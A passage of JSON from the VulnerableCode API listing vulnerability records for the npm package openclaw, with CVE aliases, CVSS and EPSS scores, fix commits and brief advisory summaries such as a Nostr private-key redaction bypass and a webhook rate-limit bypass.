"VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41354", "GHSA-rxmx-g7hr-8mx4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8v2-gft5-buee" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89082?format=api", "vulnerability_id": "VCID-da47-zdf1-mfgf", "summary": "## Summary\nOpenClaw Nostr privateKey config redaction bypass leaks plaintext signing key via config.get\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still models Nostr privateKey as plain string so config views can expose it, and the secret-schema fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57700d716f660591fb6e09727f3ca8041fa48b9d` — 2026-03-31T19:55:03+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @ccreater222 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41385", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03912", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03897", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0391", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41385" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41385", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41385" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-jjw7-3vjf-fg5j", "reference_id": "GHSA-jjw7-3vjf-fg5j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jjw7-3vjf-fg5j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41385", "GHSA-jjw7-3vjf-fg5j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-da47-zdf1-mfgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91608?format=api", "vulnerability_id": "VCID-dbcw-brhj-k7hs", "summary": "OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n## Summary\n\nSynology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Weak Webhook Token\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSynology Chat webhook auth previously rejected invalid tokens without throttling repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`.\n\n## Fix Commit(s)\n\n- `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35646", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23481", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23421", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23468", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35646" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation" }, { "reference_url": "https://github.com/advisories/GHSA-mf5g-6r6f-ghhm", "reference_id": "GHSA-mf5g-6r6f-ghhm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mf5g-6r6f-ghhm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35646", "GHSA-mf5g-6r6f-ghhm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dbcw-brhj-k7hs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90343?format=api", "vulnerability_id": "VCID-ddf9-tnrt-r7f2", "summary": "OpenClaw: Node browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n## Summary\nNode browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real released allowProfiles bypass through profile mutation and runtime profile selection, fixed and shipped in v2026.3.22+, so keep open for publish rather than close.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 